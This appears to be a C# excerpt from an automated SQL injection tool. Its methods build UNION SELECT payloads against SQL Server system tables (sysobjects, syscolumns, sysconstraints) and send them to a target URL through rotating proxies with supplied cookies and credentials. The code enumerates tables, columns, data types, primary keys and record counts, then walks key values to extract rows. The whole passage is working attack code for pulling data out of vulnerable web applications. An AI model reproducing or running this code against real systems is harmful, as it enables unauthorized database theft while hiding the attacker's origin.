private GlobalDS.Field GetFieldData(long TableID, int FieldID)
{
GlobalDS.Field retVal = new GlobalDS.Field();
StringBuilder WhereClause = new StringBuilder();
WhereClause.Append("id=").Append(TableID).Append(" and colid > ").Append(FieldID);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("name + char(58)+convert(char,xtype)", "syscolumns", WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledData = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = PulledData.Split(':');
retVal.FieldName = values[0];
retVal.DataType = GetSqlDataType(Convert.ToInt64(values[1].Trim()));
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, status)", "sysconstraints", "id=" + TableID + " and colid=" + FieldID);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
PulledData = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (PulledData.Length > 0)
{
PulledData = PulledData.Substring(1, PulledData.Length - 1);
retVal.IsPrimary = ((Convert.ToInt32(PulledData.Trim()) & 1) == 1);
}
return(retVal);
}
private GlobalDS.Table RetrieveTable(long PreviousTableID)
{
GlobalDS.Table retVal = new GlobalDS.Table();
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, name + char(58) + convert(char, id))", "sysobjects", "xtype=char(85) and id > " + PreviousTableID.ToString());
string ResultPage, ResultText;
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
string[] values = ResultText.Split(':');
retVal.Name = values[0];
retVal.ObjectID = Convert.ToInt64(values[1]);
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("convert(int, char(58) + convert(char, count(*)))", values[0], null);
ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
if (ResultText.Length > 0)
{
ResultText = ResultText.Substring(1, ResultText.Length - 1);
retVal.RecordCount = Convert.ToInt64(ResultText.Trim());
}
else
{
retVal.RecordCount = -1;
}
return(retVal);
}
private long GetTableCount()
{
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58)+convert(char,count(name))+char(58)", "sysobjects", "xtype=char(85)");
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string PulledCount = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
PulledCount = PulledCount.Substring(1, PulledCount.Length - 2).Trim();
return(Convert.ToInt64(PulledCount));
}
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
StringBuilder WhereClause = new StringBuilder();
if (CurrentPrimaryKey.Name == KeyName)
{
WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
ResultText = ResultText.Substring(1, ResultText.Length - 2);
string WorkingText = "";
switch (PrimaryKeyType)
{
case SqlDbType.VarChar:
case SqlDbType.Char:
case SqlDbType.NChar:
case SqlDbType.NText:
case SqlDbType.NVarChar:
case SqlDbType.Text:
StringBuilder ElementBuilder = new StringBuilder();
//split
char[] TextElements = ResultText.ToCharArray();
for (int i = 0; i < TextElements.Length; i++)
{
ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
}
ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ '
WorkingText = ElementBuilder.ToString();
break;
default:
WorkingText = ResultText.Trim();
break;
}
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
retVal.Value = WorkingText;
retVal.OutputValue = ResultText;
return(retVal);
}